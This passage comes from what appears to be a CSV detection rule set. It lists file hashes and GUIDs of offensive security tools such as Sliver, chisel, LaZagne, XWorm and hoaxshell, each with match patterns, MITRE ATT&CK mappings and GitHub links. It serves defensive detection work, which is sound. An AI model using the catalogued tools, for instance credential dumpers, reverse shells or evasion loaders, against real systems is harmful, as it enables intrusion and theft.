TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb*",".{0,1000}995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e*",".{0,1000}995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef*",".{0,1000}996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7*",".{0,1000}996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e*",".{0,1000}996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a*",".{0,1000}996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d*",".{0,1000}997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057*",".{0,1000}99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002*",".{0,1000}99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768*",".{0,1000}99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da*",".{0,1000}99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52*",".{0,1000}99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a*",".{0,1000}99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*99E40E7F-00A4-4FB1-9441-B05A56C47C08*",".{0,1000}99E40E7F\-00A4\-4FB1\-9441\-B05A56C47C08.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab*",".{0,1000}9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e*",".{0,1000}9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0*",".{0,1000}9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1*",".{0,1000}9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9*",".{0,1000}9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" 
"*9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378*",".{0,1000}9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*",".{0,1000}9AA32BBF\-90F3\-4CE6\-B210\-CBCDB85052B0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827*",".{0,1000}9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*",".{0,1000}9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5*",".{0,1000}9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046*",".{0,1000}9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5*",".{0,1000}9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559*",".{0,1000}9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654*",".{0,1000}9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a*",".{0,1000}9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234*",".{0,1000}9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16*",".{0,1000}9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b*",".{0,1000}9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5*",".{0,1000}9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894*",".{0,1000}9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" 
"*9B823D93-BF1B-407B-A4CD-231347F656AD*",".{0,1000}9B823D93\-BF1B\-407B\-A4CD\-231347F656AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551*",".{0,1000}9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*",".{0,1000}9b9850751be2515c8231e5189015bbe6\:49ef7638d69a01f26d96ed673bf50c45.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235*",".{0,1000}9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684*",".{0,1000}9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*9bd15de627aa46533968e0f7fae19e8b855d0a40*",".{0,1000}9bd15de627aa46533968e0f7fae19e8b855d0a40.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*",".{0,1000}9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323*",".{0,1000}9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62*",".{0,1000}9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02*",".{0,1000}9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630*",".{0,1000}9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308*",".{0,1000}9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670*",".{0,1000}9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
